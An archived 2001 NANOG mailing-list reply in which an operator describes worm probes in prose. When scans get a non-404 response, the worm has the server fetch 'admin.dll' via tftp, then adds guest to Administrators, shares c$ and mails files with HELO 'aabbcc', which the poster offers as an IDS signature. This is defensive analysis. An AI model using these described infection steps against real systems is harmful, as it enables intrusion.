[42594] in North American Network Operators' Group
Re: Worm probes
daemon@ATHENA.MIT.EDU (Chris Grout)
Tue Sep 18 12:09:28 2001
Message-Id: <5.1.0.14.0.20010918083030.00a9b2d0@mail.chrisgrout.com>
Date: Tue, 18 Sep 2001 08:52:37 -0700
To: "Bryan Heitman" <bryanh@communitech.net>, <nanog@merit.edu>
From: Chris Grout <cgrout@chrisgrout.com>
In-Reply-To: <00d801c14055$ad3a6e10$1100a8c0@administration3>
Mime-Version: 1.0
Content-Type: text/plain; charset="us-ascii"; format=flowed
X-MDaemon-Deliver-To: nanog@merit.edu
Errors-To: owner-nanog-outgoing@merit.edu
Appears that if it gets a 404 back from its intial unicode scans, it just
keeps looking elsewhere. If the server responds with anything other than a
404 (such as a 403 IP Rejected, in this case...) It attempts to get the
server to tftp a file named "admin.dll" from the scanning system.
I pulled the admin.dll from an infected box and to my non-programming eyes,
it appears to do at least the following (in no order):
1. Adds the guest account to the local Administrators group and then
activates the account
2. Use the anonymous
3. Makes sure c$ is shared
4. Tries to mail a bunch of files. HELO it uses is aabbcc. <*** Might
be able to use this for a quick and dirty IDS Sig***>
5. Looks like admin.dll ends up in "c", "d" and "e".
6. creates a file named readme.exe which is actually a wav file (weird?)
I could be totally wrong here (and probably am) but oh well...
Chris
